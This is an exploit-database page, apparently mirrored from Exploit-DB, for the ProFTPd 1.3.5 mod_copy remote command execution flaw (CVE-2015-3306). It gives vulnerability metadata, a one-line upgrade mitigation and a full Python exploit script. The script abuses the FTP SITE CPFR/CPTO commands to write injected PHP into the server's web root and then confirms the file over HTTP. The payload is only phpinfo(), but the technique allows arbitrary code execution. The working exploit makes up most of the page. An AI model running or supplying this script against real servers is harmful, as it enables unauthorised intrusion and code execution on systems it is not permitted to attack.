header-logo
Suggest Exploit
vendor:
ProFTPd
by:
Shellbr3ak
9.3
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: ProFTPd
Affected Version From: 1.3.5
Affected Version To: 1.3.5
Patch Exists: YES
Related CWE: CVE-2015-3306
CPE: a:proftpd:proftpd:1.3.5
Metasploit: https://www.rapid7.com/db/vulnerabilities/ftp-proftpd-cve-2019-12815/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2019-12815/https://www.rapid7.com/db/vulnerabilities/suse-cve-2019-12815/https://www.rapid7.com/db/vulnerabilities/debian-cve-2019-12815/https://www.rapid7.com/db/vulnerabilities/debian-DSA-3306/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-d0034536-ff24-11e4-a072-d050996490d0/https://www.rapid7.com/db/vulnerabilities/suse-cve-2015-3306/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=84215https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/ftp/proftpd_modcopy_exechttps://www.infosecmatter.com/nessus-plugin-library/?id=86546https://www.infosecmatter.com/nessus-plugin-library/?id=90684https://www.infosecmatter.com/nessus-plugin-library/?id=86547https://www.infosecmatter.com/nessus-plugin-library/?id=87725https://www.infosecmatter.com/nessus-plugin-library/?id=80886https://www.infosecmatter.com/nessus-plugin-library/?id=93845https://www.infosecmatter.com/nessus-plugin-library/?id=84796https://www.infosecmatter.com/nessus-plugin-library/?id=83347
Platforms Tested: Ubuntu 16.04.6 LTS
2021

ProFTPd 1.3.5 – ‘mod_copy’ Remote Command Execution (2)

ProFTPd 1.3.5 is vulnerable to a remote command execution vulnerability due to a flaw in the mod_copy module. An attacker can exploit this vulnerability by sending a maliciously crafted FTP command to the server. This will allow the attacker to execute arbitrary commands on the server.

Mitigation:

Upgrade to ProFTPd 1.3.6 or later.
Source

Exploit-DB raw data:

# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
# Date: 25/05/2021
# Exploit Author: Shellbr3ak
# Version: 1.3.5 
# Tested on: Ubuntu 16.04.6 LTS
# CVE : CVE-2015-3306

#!/usr/bin/env python3

import sys
import socket
import requests

def exploit(client, target):
    client.connect((target,21)) # Connecting to the target server
    banner = client.recv(74)
    print(banner.decode())
    client.send(b'site cpfr /etc/passwd\r\n')
    print(client.recv(1024).decode())
    client.send(b'site cpto <?php phpinfo(); ?>\r\n') # phpinfo() is just a PoC.
    print(client.recv(1024).decode())
    client.send(b'site cpfr /proc/self/fd/3\r\n')
    print(client.recv(1024).decode())
    client.send(b'site cpto /var/www/html/test.php\r\n')
    print(client.recv(1024).decode())
    client.close()
    print('Exploit Completed')

def check(url):
    req = requests.get(url) # Requesting the written PoC php file via HTTP
    if req.status_code == 200:
        print('[+] File Written Successfully')
        print(f'[+] Go to : {url}')
    else:
        print('[!] Something Went Wrong')
        print('[!] Directory might not be writable')

def main():
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    target = sys.argv[1]
    exploit(client, target)
    url = 'http://' + target + '/test.php'
    check(url)

if __name__ == '__main__':
    main()

Navigation

Suggest Exploit

Services By CQR